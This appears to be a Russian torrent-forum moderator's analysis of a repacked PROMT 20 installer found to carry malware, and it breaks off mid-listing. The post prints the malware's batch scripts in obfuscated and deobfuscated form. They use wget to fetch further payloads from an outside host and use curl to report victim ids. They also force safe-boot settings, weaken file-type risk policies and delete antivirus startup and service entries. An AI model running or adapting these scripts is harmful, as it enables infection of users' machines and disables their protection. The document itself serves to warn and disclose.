Eastoop ®
Куратор КПК и Мобилок
Модератор Книг и Программ
Стаж: 14 лет 10 мес.
Сообщений: 25096
Ratio: 335.13
Поблагодарили: 73479
100%
|
Promt 20 (Professional, Expert, Master, Freelance, MS Office) + Dictionaries Collection [Multi/Ru]Из 6 дистрибутивных пакетов один оказался перепакованным: PROMT_20_Professional.exe Подробности проверки вирусной активности. 1. Подозрение пользователя на вирусы вызвало отсутствие цифровой подписи у дистрибутива. Релизер не смог обнаружить вирус и заразил свой компьютер. При принудительной распаковке установочного файла с помощью 7Z обнаружилось, что распаковка происходит не полностью, но конфигуратор установки все таки удалось заполучить. Оказалось, что перепаковка выполнена при помощи Smart Install Maker и, кроме распаковки дистрибутива, в систему загружается порция файлов для скачивания вирусов.
2. Запуск на виртуальной машине позволил получить набор этих стартовых файлов. В папку windows при запуске зараженного инсталлятора распаковывается файл set-up.exe (оригинальный инсталлятор), распаковка идет долго из-за большого размера файла, а также файл a.bat, который тут же запускается. Также в папке windows создаются папки wget и curl, обеспечивающие работу батника. Код: выделить все @echo off set "a3=t" set "j=e" set "xj66=s" s%j%%a3% "yui=5" s%j%%a3% "zx3="" s%j%%a3% "gs1=in" s%j%%a3% "a5=." s%j%%a3% "c44=a" s%j%%a3% "dn=(" s%j%%a3% "gdfg5=W" s%j%%a3% "a1=h" s%j%%a3% "jh4=8" s%j%%a3% "n3=i" s%j%%a3% "a2=p" s%j%%a3% "f=x" s%j%%a3% "a6=:" s%j%%a3% "fsf4=o" s%j%%a3% "gfg33=l" s%j%%a3% "pi=r" s%j%%a3% "k=at" s%j%%a3% "aa2=l" s%j%%a3% "hy=\" s%j%%a3% "b=b" s%j%%a3% "gt12=a" s%j%%a3% "r=d" s%j%%a3% "d=%jh4%8%yui%%jh4%" s%j%%a3% "hh=st" s%j%%a3% "z=%xj66%%a2%%c44%c%j%" s%j%%a3% "bf5=d" s%j%%a3% "kl=-" s%j%%a3% "r8=no%pi%m%gt12%%aa2%" s%j%%a3% "c=w" s%j%%a3% "yt==" s%j%%a3% "s5=%xj66%%a3%ar%a3%" s%j%%a3% "b2=dy" s%j%%a3% "e9=)" s%j%%a3% "v1=n" s%j%%a3% "a4=/" s%j%%a3% "g1=%windir%" s%j%%a3% "a7=rs" s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%" :: ::----------------------------------------------------------------- :: e: %j%%f%%j% m: m%xj66%%n3% ::--------------------------------------| |------------------ %s5% %a4%%r8% %g1%%hy%S%j%%a3%-u%a2%%a5%%j%%f%%j% %n3%f %j%%f%%n3%s%a3% "%g1%%hy%y%a5%t%f%t" d%j%l %0 :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: s%j%t osver=Unknown v%j%r | findstr /IL "5.1." > nul %n3%F %errorlevel% EQU 0 s%j%t "osver=Windows_XP" %n3%F %osver% == Windows_XP %dn% go%a3%o n %e9% %j%ls%j% %dn% go%a3%o y %e9% :y s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3% f%fsf4%%pi% %a4%f %zx3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%zx3% %%i %gs1% %dn%%zx3%%ss%%zx3%%e9% d%fsf4% s%j%%a3% %%~i set "ua=%sid%" %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%b%%k%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%c44%%gfg33%%a2%%a1%%gt12%%zx3% %kl%%kl%u%xj66%e%pi%%kl%%c44%g%j%n%a3%%yt%%zx3%%ua%%zx3% %n3%f %j%%f%%n3%st %zx3%%g1%%a4%%b%%a5%%b%%k%%zx3% %dn% %g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%j%%f%%j%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%gt12%%aa2%%a2%%a1%%c44%%zx3% %s5% %a4%%r8% %g1%%hy%%b%%a5%%j%%f%%j% %e9% %j%%aa2%s%j% %dn% go%a3%o n %e9% d%j%l %0 :n d%j%%aa2% %0 :: | Код: выделить все @echo off set "a3=t" set "j=e" set "xj66=s" set "yui=5" set "zx3="" set "gs1=in" set "a5=." set "c44=a" set "dn=(" set "gdfg5=W" set "a1=h" set "jh4=8" set "n3=i" set "a2=p" set "f=x" set "a6=:" set "fsf4=o" set "gfg33=l" set "pi=r" set "k=at" set "aa2=l" set "hy=\" set "b=b" set "gt12=a" set "r=d" set "d=8858" set "hh=st" set "z=space" set "bf5=d" set "kl=-" set "r8=normal" set "c=w" set "yt==" set "s5=start" set "b2=dy" set "e9=)" set "v1=n" set "a4=/" set "g1=%windir%" set "a7=rs" set "l=http://8858.space/rs/st" :: ::----------------------------------------------------------------- :: e: exe m: msi ::--------------------------------------| |------------------ start /normal %windir%\Set-up.exe if exist "%windir%\y.txt" del %0
set osver=Unknown ver | findstr /IL "5.1." > nul iF %errorlevel% EQU 0 set "osver=Windows_XP" iF %osver% == Windows_XP ( goto n ) else ( goto y ) :y set ss=s.txt for /f "usebackq delims=" %%i in ("%ss%") do set %%~i set "ua=%sid%" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.bat" --referer="alpha" --user-agent="%sid%" if exist "%windir%/b.bat" ( %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.exe" --referer="alpha" start /normal %windir%\b.exe ) else ( goto n ) del %0 :n del %0 :: | 3. В результате исполнения батника в папку windows скачиваются еще два файла: b.bat и b.exe, первый продолжает загрузку очередной порции файлов, а второй обеспечивает защиту и восстановление батника, а также его работу. Код: выделить все @echo off :: set "sym=_" set "a3=t" set "j=e" set "xj66=s" :: s%j%%a3% "yui=5" s%j%%a3% "zx3="" s%j%%a3% "gs1=in" s%j%%a3% "gdfg5=W" s%j%%a3% "a5=." s%j%%a3% "c44=a" s%j%%a3% "dn=(" s%j%%a3% "ssd3=R" s%j%%a3% "a1=h" s%j%%a3% "dfg==" s%j%%a3% "jh4=8" s%j%%a3% "n3=i" s%j%%a3% "a2=p" s%j%%a3% "f=x" s%j%%a3% "a6=:" s%j%%a3% "fsf4=o" s%j%%a3% "lkj6=K" s%j%%a3% "gfg33=l" s%j%%a3% "pi=r" s%j%%a3% "yr3="" s%j%%a3% "k=at" s%j%%a3% "yfb={" s%j%%a3% "aa2=l" s%j%%a3% "vbvc56=O" s%j%%a3% "hy=\" s%j%%a3% "b=b" s%j%%a3% "gt12=a" s%j%%a3% "gdg5=M" s%j%%a3% "r=d" s%j%%a3% "d=%jh4%8%yui%%jh4%" s%j%%a3% "hh=st" s%j%%a3% "z=%xj66%%a2%%c44%c%j%" s%j%%a3% "bf5=d" s%j%%a3% "kl=-" s%j%%a3% "r8=no%pi%m%gt12%%aa2%" s%j%%a3% "c=w" s%j%%a3% "yt==" s%j%%a3% "s5=%xj66%%a3%ar%a3%" s%j%%a3% "b2=dy" s%j%%a3% "e9=)" s%j%%a3% "v1=n" s%j%%a3% "a4=/" s%j%%a3% "g1=%windir%" s%j%%a3% "a7=rs" s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%" s%j%%a3% "mdp5=--%pi%%j%f%j%%pi%%j%%pi%" s%j%%a3% "hg4=%c44%%gfg33%%a2%%a1%%gt12%" :: s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3% f%fsf4%%pi% %a4%f %yr3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%yr3% %%i %gs1% %dn%%yr3%%ss%%yr3%%e9% d%fsf4% s%j%%a3% %%~i set "title=%rn%" set "sub=%sid%" set "pos=%pid%" :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: %pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32 %g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_n%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_f%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%u%xj66%w%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%%c44%t%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a3%%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%m%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% %pi%%j%g%j%d%n3%t %a4%s %g1%%hy%c%a5%r%j%g bc%bf5%%j%d%n3%t %a4%s%j%t %yr3%%yfb%cu%pi%r%j%n%a3%}%yr3% s%gt12%f%j%boo%a3% %yr3%m%n3%n%n3%m%gt12%%aa2%%yr3% d%j%%aa2% %g1%%hy%b%a5%%j%%f%%j% d%j%l %g1%%hy%c%a5%r%j%g %g1%%hy%cu%pi%%aa2%%hy%cu%pi%%aa2%%a5%%j%%f%%j% %yr3%%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%s%a2%%gt12%c%j%%a4%cu%pi%%aa2%%a4%%pi%un%n3%%a5%%a2%h%a2%?%xj66%ub%n3%d%yt%%pos%%sym%%sub%%yr3% %mdp5% %yr3%%hg4%%yr3% %g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%y%a5%%a3%x%a3%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3% d%j%%aa2% %0 :: | Код: выделить все @echo off :: set "sym=_" set "a3=t" set "j=e" set "xj66=s" :: set "yui=5" set "zx3="" set "gs1=in" set "gdfg5=W" set "a5=." set "c44=a" set "dn=(" set "ssd3=R" set "a1=h" set "dfg==" set "jh4=8" set "n3=i" set "a2=p" set "f=x" set "a6=:" set "fsf4=o" set "lkj6=K" set "gfg33=l" set "pi=r" set "yr3="" set "k=at" set "yfb={" set "aa2=l" set "vbvc56=O" set "hy=\" set "b=b" set "gt12=a" set "gdg5=M" set "r=d" set "d=8858" set "hh=st" set "z=space" set "bf5=d" set "kl=-" set "r8=normal" set "c=w" set "yt==" set "s5=start" set "b2=dy" set "e9=)" set "v1=n" set "a4=/" set "g1=%windir%" set "a7=rs" set "l=http://8858.space/rs/st" set "mdp5=--referer" set "hg4=alpha" :: set ss=s.txt for /f "usebackq delims=" %%i in ("s.txt") do set %%~i set "title=%rn%" set "sub=%sid%" set "pos=%pid%" :: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%rn%" /f /reg:32 %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.bat" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.exe" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.exe" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.bat" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/e.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/usw.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/at.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/ct.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/et.reg" --referer="alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mt.reg" --referer="alpha" regedit /s %windir%\c.reg bcdedit /set "{current}" safeboot "minimal" del %windir%\b.exe del %windir%\c.reg %windir%\curl\curl.exe "http://8858.space/curl/runi.php?subid=%pid%_%sid%" --referer "alpha" %windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/y.txt" --referer="alpha" del %0 :: | 4. При исполнении b.bat скачиваются еще несколько файлов, которые работают в комплексе, размножаются по системным папкм, прописываются в автозагрузку и планировщик заданий, отключают выход в безопасный режим и загрузку антивирусов и т.д. и т.п. Список загружаемых файлов: at.reg c.bat c.exe c.reg ct.reg d.bat d.exe d.reg e.reg et.reg mgr_f.reg mgr_n.reg mt.reg usw.reg Часть файлов имеют идентичное содержимое и просто дублируют друг друга для усложнения удаления заразы. Код: выделить все @echo off :: :: set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 ) Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE4.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE3.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP20.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP19.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete 